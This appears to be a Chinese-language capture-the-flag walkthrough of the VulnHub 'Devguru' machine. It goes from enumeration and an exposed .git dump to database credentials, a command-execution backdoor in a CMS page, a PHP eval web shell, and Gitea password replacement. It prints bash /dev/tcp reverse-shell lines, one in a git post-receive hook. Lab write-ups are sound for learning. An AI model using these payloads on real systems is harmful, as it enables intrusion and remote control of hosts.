VulnHub - Devguru
信息收集
端口扫描
| Port |
Service |
Version |
| 22/tcp |
ssh |
OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) |
| 80/tcp |
http |
Apache httpd 2.4.29 ((Ubuntu)) |
| 8585/tcp |
unknown |
unknown |
Web 路径枚举
80 端口
| dirsearch -u "http://192.168.0.106" -t 60 -e * -x 404,403 --json-report report/output/dirsearch_80_output.json
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
| [11:41:56] 301 - 316B - /plugins -> http://192.168.0.106/plugins/
[11:41:57] 301 - 313B - /.git -> http://192.168.0.106/.git/
[11:41:57] 200 - 13B - /.git/COMMIT_EDITMSG
[11:41:57] 200 - 23B - /.git/HEAD
[11:41:57] 200 - 276B - /.git/config
[11:41:57] 200 - 73B - /.git/description
[11:41:57] 200 - 308KB - /.git/index
[11:41:57] 200 - 240B - /.git/info/exclude
[11:41:57] 301 - 323B - /.git/logs/refs -> http://192.168.0.106/.git/logs/refs/
[11:41:57] 200 - 158B - /.git/logs/HEAD
[11:41:57] 301 - 331B - /.git/logs/refs/remotes -> http://192.168.0.106/.git/logs/refs/remotes/
[11:41:57] 301 - 338B - /.git/logs/refs/remotes/origin -> http://192.168.0.106/.git/logs/refs/remotes/origin/
[11:41:57] 200 - 158B - /.git/logs/refs/heads/master
[11:41:57] 200 - 142B - /.git/logs/refs/remotes/origin/master
[11:41:57] 301 - 329B - /.git/logs/refs/heads -> http://192.168.0.106/.git/logs/refs/heads/
[11:41:57] 301 - 324B - /.git/refs/heads -> http://192.168.0.106/.git/refs/heads/
[11:41:57] 301 - 326B - /.git/refs/remotes -> http://192.168.0.106/.git/refs/remotes/
[11:41:57] 200 - 41B - /.git/refs/heads/master
[11:41:57] 301 - 333B - /.git/refs/remotes/origin -> http://192.168.0.106/.git/refs/remotes/origin/
[11:41:57] 200 - 41B - /.git/refs/remotes/origin/master
[11:41:57] 301 - 323B - /.git/refs/tags -> http://192.168.0.106/.git/refs/tags/
[11:41:57] 200 - 413B - /.gitignore
[11:41:59] 200 - 2KB - /.htaccess
[11:42:10] 200 - 12KB - /0
[11:42:14] 200 - 18KB - /About
[11:42:16] 200 - 1KB - /README.md
[11:42:24] 200 - 18KB - /about
[11:42:32] 200 - 4KB - /adminer.php
[11:42:38] 302 - 410B - /backend/ -> http://192.168.0.106/backend/backend/auth
[11:42:44] 301 - 315B - /config -> http://192.168.0.106/config/
[11:43:01] 200 - 12KB - /index.php
[11:43:09] 301 - 316B - /modules -> http://192.168.0.106/modules/
[11:43:26] 200 - 10KB - /services/
[11:43:26] 200 - 10KB - /services
[11:43:28] 301 - 316B - /storage -> http://192.168.0.106/storage/
[11:43:31] 301 - 315B - /themes -> http://192.168.0.106/themes/
|
| http://devguru.local/adminer.php
|
| http://devguru.local/backend/backend/auth
|
两个后台都需要登录凭证
8585 端口
| dirsearch -u "http://192.168.0.106:8585" -t 60 -e * -x 404,403 --json-report report/output/dirsearch_8585_output.json
|
| [11:45:00] Starting:
[11:45:15] 302 - 34B - /admin -> /user/login
[11:45:16] 302 - 34B - /admin/ -> /user/login
[11:45:16] 302 - 34B - /admin/?/login -> /user/login
[11:45:18] 200 - 575B - /api/swagger
[11:45:20] 302 - 27B - /css -> /css
[11:45:21] 200 - 160B - /debug
[11:45:21] 200 - 160B - /debug/
[11:45:22] 302 - 37B - /explore -> /explore/repos
[11:45:22] 302 - 29B - /fonts -> /fonts
[11:45:25] 302 - 27B - /img -> /img
[11:45:25] 302 - 34B - /issues -> /user/login
[11:45:25] 302 - 26B - /js -> /js
[11:45:26] 200 - 670B - /manifest.json
[11:45:27] 200 - 10KB - /explore/repos
[11:45:38] 200 - 9KB - /user/login/
|
git dump
利用 Git-Dumper 下载 repo
| git-dumper http://devguru.local/.git .
|
从 config/database.php 中得到了数据库的凭证,可以登录数据库管理的后台:
| http://devguru.local/backend/backend/auth
|
漏洞发现
登录 mysql 后台
在表 backend_users 中找到一个无法解密的用户凭证,这里可以直接修改加密密码为一个新的密码,也可以添加一个新的用户凭证
新建用户
替换密码
生成新的密码,替换未解密的密码
| https://bcrypt-generator.com/
|
漏洞利用
命令执行
CMS 页面下的 HOME 项,在 Markup 添加如下代码
在 Code 添加如下代码
| function onStart()
{
$this->page["runCmd"] = system($_GET["cmd"]);
}
|
Save 以后,选择 Preview,并执行命令
| http://devguru.local/?cmd=id
|
reverse shell
| bash -c 'exec bash -i &>/dev/tcp/192.168.0.108/8848 <&1'
|
后渗透
C2
使用 phpsploit 比 nc 要方便多了,metasploit 也可以
写入 payload (/var/www/html)
| echo '<?php @eval($_SERVER["HTTP_PHPSPL01T"]); ?>' > shell.php
|
设置 C2
| > set TARGET http://devguru.local/shell.php
> exploit
|
系统内部信息收集
发现敏感文件
下载 app.ini.bak 到本地检查后,从中得到 gitea 数据库的凭证
| > download app.ini.bak /tmp
|
登录 Mysql
登录 Gitea
go-gitea 是开源的,找到相关的代码,生成新的密码 hash
| https://github.com/go-gitea/gitea/blob/master/models/user.go
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| func hashPassword(passwd, salt, algo string) string {
var tempPasswd []byte
switch algo {
case algoBcrypt:
tempPasswd, _ = bcrypt.GenerateFromPassword([]byte(passwd), bcrypt.DefaultCost)
return string(tempPasswd)
case algoScrypt:
tempPasswd, _ = scrypt.Key([]byte(passwd), []byte(salt), 65536, 16, 2, 50)
case algoArgon2:
tempPasswd = argon2.IDKey([]byte(passwd), []byte(salt), 2, 65536, 8, 50)
case algoPbkdf2:
fallthrough
default:
tempPasswd = pbkdf2.Key([]byte(passwd), []byte(salt), 10000, 50, sha256.New)
}
return fmt.Sprintf("%x", tempPasswd)
}
|
生成新 Hash:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
| package main
import (
"crypto/sha256"
"fmt"
"golang.org/x/crypto/pbkdf2"
)
func main() {
var tempPasswd []byte
var passwd, salt string
passwd = "callme"
salt = "AaaaaBbbbb"
tempPasswd = pbkdf2.Key([]byte(passwd), []byte(salt), 10000, 50, sha256.New)
fmt.Println(fmt.Sprintf("%x",tempPasswd))
}
|
| f1558adac8fddf102f3d5caf42d8648ad01c4bd6d6041f2e7885cb164384031f1172939535eb6ae7ca190101638b4e59cfb7
|
进一步利用
Remote Code Execution using git hooks
搜索相关的信息:git hook reverse shell
检查 gitea 版本
在 post-receive 下写入命令
| #!/bin/bash
bash -c 'exec bash -i &>/dev/tcp/192.168.0.108/8848 <&1'
|
下一步,在攻击方 PC 执行命令:
监听端口
| git clone http://devguru.local:8585/imin/shell.git
cd shell/
touch README.txt
git add .
git config user.name imin
git config user.email imin@devguru.local
git commit -m 'Add README.txt'
git push origin master
|
User.txt
权限提升
收集提权信息
sudo -l
| User frank may run the following commands on devguru:
(ALL, !root) NOPASSWD: /usr/bin/sqlite3
|
sqlite3 到 shell:
当前 sudo 版本存在安全绕过漏洞
exploit
root.txt
